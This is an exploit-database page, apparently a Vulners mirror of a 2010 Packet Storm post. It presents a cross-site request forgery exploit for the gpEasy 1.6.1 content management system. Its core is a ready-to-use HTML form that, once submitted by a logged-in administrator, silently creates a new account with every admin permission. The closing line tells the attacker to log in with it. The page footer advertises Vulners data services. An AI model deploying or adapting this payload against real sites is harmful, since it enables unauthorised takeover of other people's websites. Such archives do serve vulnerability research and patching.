Lucene search
K

gpEasy 1.6.1 Cross Site Request Forgery

🗓️ 29 Apr 2010 00:00:00Reported by giudinvxType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

gpEasy 1.6.1 CSRF Remote Add Admin Exploit by Giuseppe 'giudinvx' D'Invern

Code
`  
  
=============================================  
gpEasy <= 1.6.1 CSRF Remote Add Admin Exploit  
=============================================  
  
Author : Giuseppe 'giudinvx' D'Inverno  
Email : <giudinvx[at]gmail[dot]com>  
Date : 04-29-2010  
Site : http://www.giudinvx.altervista.org/  
Location : Naples, Italy  
  
--------------------------------------------------------  
Application Info  
Site : http://www.gpeasy.com/  
Version: 1.6.1  
--------------------------------------------------------  
  
==============[[ -Exploit Code- ]]==============  
  
<html>  
<form method="post" action="[patth]/index.php/Admin_Users">  
<input type="text" value="xxx" name="username"><br/>  
<input type="password" value="xxx" name="password"><br/>  
<input type="password" value="xxx" name="password1"><br/>  
<input type="text" value="xxx" name="email"><br/>  
<input value="Admin_Menu" type="hidden" name="grant[]">  
<input value="Admin_Uploaded" type="hidden" name="grant[]">  
<input value="Admin_Extra" type="hidden" name="grant[]">  
<input value="Admin_Theme" type="hidden" name="grant[]">  
<input value="Admin_Users" type="hidden" name="grant[]">  
<input value="Admin_Configuration" type="hidden" name="grant[]">  
<input value="Admin_Trash" type="hidden" name="grant[]">  
<input value="Admin_Uninstall" type="hidden" name="grant[]">  
<input value="Admin_Addons" type="hidden" name="grant[]">  
<input value="Admin_New" type="hidden" name="grant[]">  
<input value="Admin_Theme_Content" type="hidden" name="grant[]">  
<input type="hidden" value="newuser" name="cmd">  
<input type="submit" value="Continue" name="aaa" class="submit">  
</form>  
</html>  
  
# Now you have an Admin user with name: xxx and password: xxx, just login  
page [path]/index.php/Admin  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation